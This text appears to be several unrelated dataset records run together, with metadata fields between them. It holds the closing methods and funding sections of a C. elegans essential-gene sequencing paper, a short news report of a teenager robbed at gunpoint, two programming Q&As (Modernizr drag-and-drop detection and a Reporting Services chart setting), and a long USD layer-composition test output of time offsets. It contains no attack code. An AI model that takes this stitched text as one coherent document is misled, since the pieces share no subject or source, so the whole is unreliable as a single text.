(CIDs) \[[@CR41]\]. In mammalian cells, TAD boundaries are enriched in transcription start sites, active transcription, active chromatin marks, housekeeping genes, tRNA genes, and short interspersed nuclear elements (SINEs) \[[@CR55]\]. The observation that essential genes expression in very specific developmental stages suggest that expression of essential genes are tightly regulated rather than constitutive expression. By being within the TAD structure, the expression of genes can be controlled by either facilitating or preventing loop interaction \[[@CR60]\]. Proteins do not function alone. We found essential genes act like hubs in protein-protein interaction with higher number of protein interactions than non-essential genes. Consistent with the study in yeast where the most highly connected genes in the cell are the most important ones for an organism's viability \[[@CR86]\]. Conclusions {#Sec12} =========== In the present work, we comprehensively analyzing genomic mutations in 130 Chromosome I mutants of *C. elegans* with a combination of targeted and forward mutational approaches \[[@CR27]\] and successfully identified 44 essential genes with high confidence, of which 6 are new essential genes never characterized by mutant alleles before. This is also the first time that all essential genes identified to-date has been analyzed together with 3D chromosome conformation data where we found that essential genes are more located within a TAD structure rather than TAD boundaries. The data presented here provides the genetic resource for further functional studies of essential genes and more understanding towards the minimal set of genes and pathway for survival. Methods {#Sec13} ======= *C. elegans* strains {#Sec14} -------------------- The strains used are provided in Additional file [1](#MOESM1){ref-type="media"}. The strains were generated by mutagenizing KR235 \[*dpy-5 (e61), +, unc-13 (e450)*/*dpy-5 (e61), unc-15 (e73), +*; *sDp2*\] growing in nematode growth medium streaked with *E. coli* OP50 \[[@CR27], [@CR87]\]. The maintenance of each strain and the isolation of its genomic DNA were performed as previously described \[[@CR27]\]. Library preparation and sequencing was performed by the BC Cancer Agency Genome Science Center. Mutation identification procedure {#Sec15} --------------------------------- The FASTQ reads were aligned to the *C. elegans* reference genome (WS246) using BWA \[[@CR88]\]. GATK \[[@CR89]\], and SAMtools \[[@CR90]\] were used to called for variants \[[@CR27]\]. The candidate essential genes on Chromosome I are rescued by a third wild-type allele on *sDp2*, and thus we focused on finding mutations that exhibit the variant frequencies to be around 66%. In our sequencing data, we removed strains without the expected *dpy-5 (e61)I* and *unc-13 (e450)I* mutation and strains without sufficient sequencing coverage from further analysis. Single nucleotide variations (SNVs) that exhibited the variant ratio between 40 and 90% were filtered from the sequencing data. Two filtration steps were performed: First, some variations could come from the starting strain KR235 that was used for mutagenesis. In order to filter the background variations between the starting strain and the *C. elegans* reference genome, we excluded all variations that identified in KR235 \[[@CR27], [@CR74]\]. Second, the variations were required to be supported by at least 8 reads with both forward and reverse directions. After the aforementioned two steps of filtration, the remaining SNVs were subjected to subsequent essential gene identification. The molecular identification of essential genes on Chromosome I (left) is based on three lines of evidence. First, variations in each strain were screened based on previous genetic mapping data \[[@CR80], [@CR91], [@CR92]\]. Second, lethal phenotypes, which are supported by RNAi or existing alleles in WormBase, increase the credibility of the mutations ([www.wormbase.org](http://www.wormbase.org/)). Last, mutations, such as splicing or nonsense, which usually lead to harmful phenotypes, in the million mutation project (MMP) database should be absent in essential genes \[[@CR30]\]. Thus, it is less likely that the candidate essential genes in the MMP database contain lethal mutations. With the aforementioned information, in total, 44 sequenced essential genes were identified with high confidence in the Chromosome I balanced regions, 9 of which were found in our previous study \[[@CR27]\], which were summarized in Table [1](#Tab1){ref-type="table"} and Additional file [2](#MOESM2){ref-type="media"}. Essential genes functional analysis {#Sec16} ----------------------------------- Pfam analysis: The domain families present in each protein was searched with InterProScan \[[@CR93]\] using the Pfam database \[[@CR94]\]. Gene Ontology (GO) analysis: GO annotation was done using Blast2GO \[[@CR95]\]. This part of the analysis was also done by the PANTHER classification system \[[@CR96]\] from the website <http://pantherdb.org/>. GO annotations (Cellular Component, Biological Process, and Molecular Function) and Protein Class (PANTHER Protein Class, are grouping terms to classify protein families and subfamilies, that are sometimes but not always related to molecular function. \[[@CR97]\]) were examined individually. Use the Bonferroni correction for multiple testing. Gene cluster: The Hi-C and TAD data of Wild-Type (N2) mixed-stage embryos of *C.elegans* were obtained from Crane et al. \[[@CR50]\]. The data were binned into 50 kb non-overlapping genomic intervals, which we termed as locus. The interaction data between loci were normalized using standard ICE methods \[[@CR98]\]. The significance of the interaction between a pair of loci was calculated using *Fit-Hi-C* \[[@CR99]\] with a minimum 15 contact counts and *P* \< 0.01. When a locus showed significant interaction with 2 or more other loci, all interacting loci were grouped together. The genes within a group of interacting loci were considered as interacting genes and the interaction frequency of each gene was counted. The average interaction frequencies of genes in each group were compared. The *P*-values were obtained from the Mann-Whitney U test / the Wilcoxon rank sum test after the Levene's test. Protein connectivity: The protein interaction data for *C. elegans* were obtained from BioGRID \[[@CR100]--[@CR102]\]. There are 3911 unique genes involved in 8488 non-redundant protein-protein interactions. We counted the number of protein-protein interactions of each gene and the average protein-protein interaction frequencies of genes in each group were compared. The *P*-values were obtained from the Mann-Whitney U test / the Wilcoxon rank sum test after the Levene's test. Gene expression: The gene expression data for *C. elegans* were obtained from the *GExplore* (version 1.4) database \[[@CR103]\], which contains developmental stages originated from the NHGRI modENCODE project \[[@CR104], [@CR105]\]. The expression profile clustering was done using Weighted correlation network analysis (WGCNA), which was used for detecting clusters (modules) of highly correlated/co-expression genes \[[@CR106]\]. Additional files ================ {#Sec17} Additional file 1:List of alleles studied. The alleles used for WGS are listed in the 2nd column. (XLS 44 kb) Additional file 2:Identifications of essential genes. Including information about the allele name, the strain name, the genetic mapping zones \[[@CR33]\], location, predicted gene, allele mutation, RNAi support, alleles support, and MMP support of the essential genes. The asterisk (\*) signify a stop codon. (XLS 43 kb) Additional file 3:The KEGG annotation and the GO annotation. The KEGG annotation of genes are listed in the 3nd column .The GO annotation of genes are listed in the 4nd column. (XLS 57 kb) EMS : *E*thyl *m*ethane *s*ulfonate GO : *G*ene *o*ntology KEGG : Kyoto Encyclopedia of Genes and Genomes KOG : EuKaryotic Orthologous Groups MMP : *M*illion *m*utation *p*roject SNVs : *S*ingle *n*ucleotide *v*ariations WGCNA : Weighted correlation network analysis WGS : *W*hole *g*enome *s*equencing We thank members of the Baillie lab and Rose lab for helpful comments and technical support. We thank BC Cancer Agency Genome Sciences Centre for performing the whole genome sequencing. Funding {#FPar1} ======= This work is funded in part by Canadian Institute for Health Research Fanconi Anemia Fellowship 289473 and Natural Sciences and Engineering Research Council grant RGPIN - 2015 - 04266. Availability of data and materials {#FPar2} ================================== The sequencing data have been deposited in the NCBI Sequence Read Archive (accession numbers: SRR6739866- SRR6739996). DLB, AMR, and JSC conceived the study. JSC prepared genomic DNA for WGS. JSC and SY analyzed the WGS data. SY conducted essential gene identification, functional annotation analysis, gene cluster analysis, and protein connectivity analysis. CZ and DZ performed the gene expression analysis. FZ performed the Gene essentiality vs. gene TAD boundaries analysis. SY, CZ, DZ, JSC wrote the manuscript. All authors read and approved the final manuscript. Ethics approval and consent to participate {#FPar3} ========================================== Not applicable. Consent for publication {#FPar4} ======================= Not applicable. Competing interests {#FPar5} =================== The authors declare that they have no competing interests. Publisher's Note {#FPar6} ================ Springer Nature remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.
null
minipile
NaturalLanguage
mit
null
17-year-old girl hit with gun, robbed Tools A 17-year-old girl was struck on the forehead with the butt of a gun Thursday during a robbery in the Crocker Amazon neighborhood. The suspect, also a teenager, grabbed cash from the girl’s hands in the 1500 block of Geneva Avenue around 10:30 p.m., police said. The woman was hit after she tried to wrestle the money back, they said.
null
minipile
NaturalLanguage
mit
null
Q: Detecting drag and drop with Modernizr (not file drag and drop) I've spent a fair while looking for the answer to this question and either found answers that are out of date or answers that relate to file drag and drop. I just want to check if a user's browser supports HTML5 drag and drop. At the moment the line... if (!Modernizr.draganddrop) { // non-HTML5 alternative drag and drop code here } ...returns true for any IE version I emulate. Why does Modernizr think that IE doesn't support drag and drop at all? I read that IE9 onward does... Should I be checking the browser version instead? Any help, much appreciated. A: Just use javascript rather than Modernizr: function dragAndDropSupported () { return 'draggable' in document.createElement('span'); } Check to see if dragAndDropSupported() === true
null
minipile
NaturalLanguage
mit
null
Q: Delete blank space before and after axis column and complete the color in last area I have the chart in my report that I have create with ReportingServices. The report works but I want to change two properties, so I don't know how can I find its. The chart is this: If you see, there is a blank space before "Mon" and after "Sun", I don't want that blank space before and after the Day. For second I want to extend the Red Area to end of the chart. It's possibile this??? Regards I try to change this properties: ChartArea properties, then I have selected Custom Position, then I have set Left properties = 0 but the result is the same A: You right click on the axis-> Horizontal Axis Properties-> when the property screen appears you set Side Margins to Disabled.
null
minipile
NaturalLanguage
mit
null
Loading @TimeCodesPerSecond/root.sdf@ ------------------------------------------------------------------------ Layer Stack: root.sdf s.sdf ss.sdf ss_48tcps.sdf ss_24tcps_12fps.sdf ss_12fps.sdf s_48tcps.sdf ss.sdf ss_48tcps.sdf ss_24tcps_12fps.sdf ss_12fps.sdf s_24tcps_12fps.sdf ss.sdf ss_48tcps.sdf ss_24tcps_12fps.sdf ss_12fps.sdf s_12fps.sdf ss.sdf ss_48tcps.sdf ss_24tcps_12fps.sdf ss_12fps.sdf ------------------------------------------------------------------------ Results for composing </SS4> Prim Stack: ss_12fps.sdf /SS4 ss_12fps.sdf /SS4 ss_12fps.sdf /SS4 ss_12fps.sdf /SS4 ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref Time Offsets: root.sdf /SS4 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ref.sdf /Ref reference (offset=110.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=110.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=110.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=110.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=100.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=100.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=100.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=100.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=130.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=130.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=130.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=130.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ------------------------------------------------------------------------ Results for composing </SS3> Prim Stack: ss_24tcps_12fps.sdf /SS3 ss_24tcps_12fps.sdf /SS3 ss_24tcps_12fps.sdf /SS3 ss_24tcps_12fps.sdf /SS3 ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref Time Offsets: root.sdf /SS3 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ref.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=70.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=70.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=60.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=60.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=60.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=60.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=90.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=90.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=90.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=90.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ------------------------------------------------------------------------ Results for composing </SS2> Prim Stack: ss_48tcps.sdf /SS2 ss_48tcps.sdf /SS2 ss_48tcps.sdf /SS2 ss_48tcps.sdf /SS2 ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref Time Offsets: root.sdf /SS2 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_12fps.sdf sublayer (offset=10.00, scale=4.00) ss.sdf sublayer (offset=50.00, scale=4.00) ss_48tcps.sdf sublayer (offset=50.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=50.00, scale=4.00) ss_12fps.sdf sublayer (offset=50.00, scale=8.00) ref.sdf /Ref reference (offset=50.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=50.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=50.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=50.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=40.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=40.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=40.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=40.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ref.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_48tcps.sdf /Ref reference (offset=70.00, scale=4.00) ref_s.sdf sublayer (offset=0.00, scale=2.00) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_s_12fps.sdf sublayer (offset=0.00, scale=4.00) ref_24tcps_12fps.sdf /Ref reference (offset=70.00, scale=8.00) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.50) ref_s_12fps.sdf sublayer (offset=0.00, scale=2.00) ref_12fps.sdf /Ref reference (offset=70.00, scale=16.00) ref_s.sdf sublayer (offset=0.00, scale=0.50) ref_s_48tcps.sdf sublayer (offset=0.00, scale=0.25) ref_s_24tcps_12fps.sdf sublayer (offset=0.00, scale=0.50) ------------------------------------------------------------------------ Results for composing </SS1> Prim Stack: ss.sdf /SS1 ss.sdf /SS1 ss.sdf /SS1 ss.sdf /SS1 ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_48tcps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_24tcps_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref ref_12fps.sdf /Ref ref_s.sdf /Ref ref_s_48tcps.sdf /Ref ref_s_24tcps_12fps.sdf /Ref ref_s_12fps.sdf /Ref Time Offsets: root.sdf /SS1 root (offset=0.00, scale=1.00) s.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) s_48tcps.sdf sublayer (offset=10.00, scale=1.00) ss.sdf sublayer (offset=20.00, scale=4.00) ss_48tcps.sdf sublayer (offset=20.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=20.00, scale=4.00) ss_12fps.sdf sublayer (offset=20.00, scale=8.00) s_24tcps_12fps.sdf sublayer (offset=10.00, scale=2.00) ss.sdf sublayer (offset=30.00, scale=4.00) ss_48tcps.sdf sublayer (offset=30.00, scale=2.00) ss_24tcps_12fps.sdf sublayer (offset=30.00, scale=4.00) ss_12fps.sdf sublayer (offset=30.00, scale=8.00) 